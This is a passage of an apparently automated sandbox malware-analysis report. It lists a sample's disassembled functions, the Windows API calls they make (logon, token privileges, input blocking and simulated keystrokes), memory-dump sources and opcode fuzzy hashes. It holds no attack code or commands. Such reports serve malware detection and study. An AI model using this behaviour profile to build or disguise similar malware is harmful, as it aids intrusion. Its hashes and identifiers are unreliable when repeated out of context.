                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                  • String ID:
                                                                  • API String ID: 33631002-0
                                                                  • Opcode ID: 763122e1ad38ac3ece77aa93edb505b119bc8959331b5647df261f4f0a13fbca
                                                                  • Instruction ID: ae7b2303fcabe7a917409f6987673deea609c436c01e5dec1cc8c97764191976
                                                                  • Opcode Fuzzy Hash: 763122e1ad38ac3ece77aa93edb505b119bc8959331b5647df261f4f0a13fbca
                                                                  • Instruction Fuzzy Hash: 96111E71E01228BFDB118FA9EC45FAEBBBCEB45B50F104156F900E6290D7B05A058BA5
                                                                  Function 003971FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00397223
                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0039723A
                                                                  • FreeSid.ADVAPI32(?), ref: 0039724A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                  • String ID:
                                                                  • API String ID: 3429775523-0
                                                                  • Opcode ID: d7647a645fae4fbbfac6dcbf7220beea33b2975708c6f7a9933c2fbcf398287d
                                                                  • Instruction ID: 70fe18c8f13a37c0629a83c2707a8edf55d7a69ddcb24a4974988533d53d0cd8
                                                                  • Opcode Fuzzy Hash: d7647a645fae4fbbfac6dcbf7220beea33b2975708c6f7a9933c2fbcf398287d
                                                                  • Instruction Fuzzy Hash: 84F01275915209BFDF05DFE4DD89AEDBBBCEF48301F104469A502E2191E27056448B10
                                                                  Function 0039F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0039F599
                                                                  • FindClose.KERNEL32(00000000), ref: 0039F5C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: c91ed5c87b287b8b888c3495c021ebfd91798691e55c6b775a6cb6ae66e4cfd7
                                                                  • Instruction ID: 40105ddeaacff9e9f7f952edcf2813a08cfc75842a0682508ee15dbb9b57c40b
                                                                  • Opcode Fuzzy Hash: c91ed5c87b287b8b888c3495c021ebfd91798691e55c6b775a6cb6ae66e4cfd7
                                                                  • Instruction Fuzzy Hash: 481184726146009FDB11EF28D845A2EB7E9FF85325F01891EF8A5DB2A1DB30AD058B85
                                                                  Function 0039CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003ABE6A,?,?,00000000,?), ref: 0039CEA7
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003ABE6A,?,?,00000000,?), ref: 0039CEB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: c5ec367301cdcd37dcc948c26950be8feb36d9912717794beb2cbc74fb9c188f
                                                                  • Instruction ID: d0c1d3dbc98670afbb984565c16128b47936ad4a758f62ef7720a7ca4c5aa6a1
                                                                  • Opcode Fuzzy Hash: c5ec367301cdcd37dcc948c26950be8feb36d9912717794beb2cbc74fb9c188f
                                                                  • Instruction Fuzzy Hash: F0F0E231411229BBDB229BA0DC49FEA736CBF08352F008126F819D6080C7309A04CBA0
                                                                  Function 0039411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00394153
                                                                  • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00394166
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InputSendkeybd_event
                                                                  • String ID:
                                                                  • API String ID: 3536248340-0
                                                                  • Opcode ID: a588acccdbfce34a45b81db43ee9884d9848c63b706b73f16b67bb5a9294cd18
                                                                  • Instruction ID: ca0f04aa0ed5ed6395a63a8c04549a3c72216af7d06014f600d84c1051c4e51a
                                                                  • Opcode Fuzzy Hash: a588acccdbfce34a45b81db43ee9884d9848c63b706b73f16b67bb5a9294cd18
                                                                  • Instruction Fuzzy Hash: 4CF0677080024DAFDF069FA0D805BBE7BB8EF00305F00800AF966A6292D77986129FA0
                                                                  Function 0038AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0038ACC0), ref: 0038AB99
                                                                  • CloseHandle.KERNEL32(?,?,0038ACC0), ref: 0038ABAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: ef9aa3edf3520ff9c0d6ff540ec25b947d9be07e4340b4309be51713632c82e4
                                                                  • Instruction ID: 5af8b9888264d75aecc456e403c3b0fff896227e26a6c744a137145727154298
                                                                  • Opcode Fuzzy Hash: ef9aa3edf3520ff9c0d6ff540ec25b947d9be07e4340b4309be51713632c82e4
                                                                  • Instruction Fuzzy Hash: 76E0E675001610AFE7272F54FC05D777BEDEF04320B20C46AF59A85474D762AC90DB50
                                                                  Function 003781AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00376DB3,-0000031A,?,?,00000001), ref: 003781B1
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003781BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: c6239d7fdc19215e7dc32669b8319965f9ad47b7be0195398f02a5cde3dae656
                                                                  • Instruction ID: 38a8b4ebb6fc2ffd8282e39b275ec72c3c0231f27c4626959ecd7299147a39e2
                                                                  • Opcode Fuzzy Hash: c6239d7fdc19215e7dc32669b8319965f9ad47b7be0195398f02a5cde3dae656
                                                                  • Instruction Fuzzy Hash: 42B09235085608BBDB022BA5FC09B587F6CEB08752F004012F60D440618B7254108A92
                                                                  Function 00363200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: A
                                                                  • API String ID: 3964851224-1886306616
                                                                  • Opcode ID: 83ea569f9fbb1a46e58cc61eccf5b5c8c2a95dd5a097806ef9a29f0494279d94
                                                                  • Instruction ID: 7454ec0535e4fbbe570f9f24c4b50f1df4423f11b5bc6f5cd79b48adc0b4fab0
                                                                  • Opcode Fuzzy Hash: 83ea569f9fbb1a46e58cc61eccf5b5c8c2a95dd5a097806ef9a29f0494279d94
                                                                  • Instruction Fuzzy Hash: 71929A706083418FD726DF18C484F6ABBE4BF89304F15885DE98A8B3A6D771ED45CB52
                                                                  Function 0037D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e56dfbdcddbee31f33a45ed37a33d849689b2293c6d5d00229e7c6157d36642f
                                                                  • Instruction ID: 045ae7b19f868776c789e15ff0ca8aa7df7e7ea9f45d92a49c3b2f3242ff0e4a
                                                                  • Opcode Fuzzy Hash: e56dfbdcddbee31f33a45ed37a33d849689b2293c6d5d00229e7c6157d36642f
                                                                  • Instruction Fuzzy Hash: FA32F522D29F414DD7339634D862336A29DAFB73D4F15D727E81EB9DAAEB29C4834100
                                                                  Function 003596C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 674341424-0
                                                                  • Opcode ID: be97c45f36f32611951b70aa18dcc8028ba86ef403be6a09c0d69381aae357bd
                                                                  • Instruction ID: bc713dcb22c2e9643eaea8d4535b31d35959524f48bdc5326e3faa4591ab2ed1
                                                                  • Opcode Fuzzy Hash: be97c45f36f32611951b70aa18dcc8028ba86ef403be6a09c0d69381aae357bd
                                                                  • Instruction Fuzzy Hash: CB228771618300DFD726DF24C891F6BB7E4AF84300F11491EF89A9B2A1DB71E948CB92
                                                                  Function 0038038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 20fefb13223964ff304aad48f6b0bd344a13907a7a9ac49411fe9e118ac94897
                                                                  • Instruction ID: ab3174704ce04cc5191d2a435b237304a62a456dd8fbc52cfdde5d0ac1c88732
                                                                  • Opcode Fuzzy Hash: 20fefb13223964ff304aad48f6b0bd344a13907a7a9ac49411fe9e118ac94897
                                                                  • Instruction Fuzzy Hash: 3CB1D320D2AF814DD76396398871336B65CAFBB3D9F91D71BFC1A78D62EB2185834180
                                                                  Function 0039B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __time64.LIBCMT ref: 0039B6DF
                                                                    • Part of subcall function 0037344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0039BDC3,00000000,?,?,?,?,0039BF70,00000000,?), ref: 00373453
                                                                    • Part of subcall function 0037344A: __aulldiv.LIBCMT ref: 00373473
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                  • String ID:
                                                                  • API String ID: 2893107130-0
                                                                  • Opcode ID: ab409af9463748e952da8041f85f032fbfb811cc54118e07155b106264b1ef66
                                                                  • Instruction ID: 518297eb9d93991e12288999b2fa159251249d97c36c962a6b7ad829c3222344
                                                                  • Opcode Fuzzy Hash: ab409af9463748e952da8041f85f032fbfb811cc54118e07155b106264b1ef66
                                                                  • Instruction Fuzzy Hash: 5E2160726345108BC72ACF28D481A92F7E1EB95311B248E7DE4E5CB280CB74B905DB58
                                                                  Function 003A6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • BlockInput.USER32(00000001), ref: 003A6ACA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  • Opcode ID: 84faaa339644bfde736743c4058dcb57f7126eeeb60cc0de981463ed02d20250
                                                                  • Instruction ID: a19d6682051beb71e74256c293b1f63a752e0a871b3d996053081f18edc61417
                                                                  • Opcode Fuzzy Hash: 84faaa339644bfde736743c4058dcb57f7126eeeb60cc0de981463ed02d20250
                                                                  • Instruction Fuzzy Hash: ADE048752002046FC741EF9DD405D56B7ECEF75751F05C416F945D7261DAB0F8048B90
                                                                  Function 003974BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003974DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: deca24b48bcf4a85095ee2ec789130695c9fdebedda6c6d6fca122b82a2e3d78
                                                                  • Instruction ID: 244cdb365a0bfd4afb255b66084467a1d5e85ad36322c85966adb95b9135c8c4
                                                                  • Opcode Fuzzy Hash: deca24b48bcf4a85095ee2ec789130695c9fdebedda6c6d6fca122b82a2e3d78
                                                                  • Instruction Fuzzy Hash: 5CD09EA667C70579ED2B07269C1FF761A0DF3017C1F969289B582CD4C3B99078459132
                                                                  Function 0038B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0038AD3E), ref: 0038B124
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  • Opcode ID: 34006bd66332179321ce2b1b64c8fd79d711d7c6a2152f30e211dca2bd47cfd8
                                                                  • Instruction ID: 3cf46256a0767a3b9c6fa4bc3247738784b9461fcabb88d8e55966917f9405a2
                                                                  • Opcode Fuzzy Hash: 34006bd66332179321ce2b1b64c8fd79d711d7c6a2152f30e211dca2bd47cfd8
                                                                  • Instruction Fuzzy Hash: E9D09E321A464EAFDF025FA4EC06EAE3F6AEB05701F448511FA15D50A1C675D531AB50
                                                                  Function 003CB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: f95ee2b970eee87fe3c5cb2c2e490aa2bc863884b832da43988b4f1036dfd795
                                                                  • Instruction ID: de7740fcb1a3f75d05f0f8f55d8125748355e6fc70913e28a0dc2148384ef4e5
                                                                  • Opcode Fuzzy Hash: f95ee2b970eee87fe3c5cb2c2e490aa2bc863884b832da43988b4f1036dfd795
                                                                  • Instruction Fuzzy Hash: 23C04CB140150DDFC752CBC0DD44EEEB7BCAB04705F1040969105F1110D7709B459B72
                                                                  Function 00378189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0037818F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 9c11333128bc68ac27d8cfab8f0ea77f76d8dd07a9e748164b30fa2be44836cd
                                                                  • Instruction ID: c5bb2d18a640492725e4cb1211350b2c87c09cebb443b28aa84d452503224b90
                                                                  • Opcode Fuzzy Hash: 9c11333128bc68ac27d8cfab8f0ea77f76d8dd07a9e748164b30fa2be44836cd
                                                                  • Instruction Fuzzy Hash: ECA0113008020CAB8F022B82FC088883F2CEA002A0B000022F80C000208B22A8208A82
                                                                  Function 003593F0 Relevance: .5, Instructions: 531COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 070663177abf7b00af230f7fd91e1d679f3e4ac4164aed74a07c20baf2897507
                                                                  • Instruction ID: 079398661a737bb1e637a97e82cd80a58a9aa601d64c02831b232cdc08082be8
                                                                  • Opcode Fuzzy Hash: 070663177abf7b00af230f7fd91e1d679f3e4ac4164aed74a07c20baf2897507
                                                                  • Instruction Fuzzy Hash: ED128E70A00209DFDF06DFA5D985AAEB7F5FF48301F108529E806E7265EB35AD28CB54
                                                                  Function 0035E3E3 Relevance: .5, Instructions: 521COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
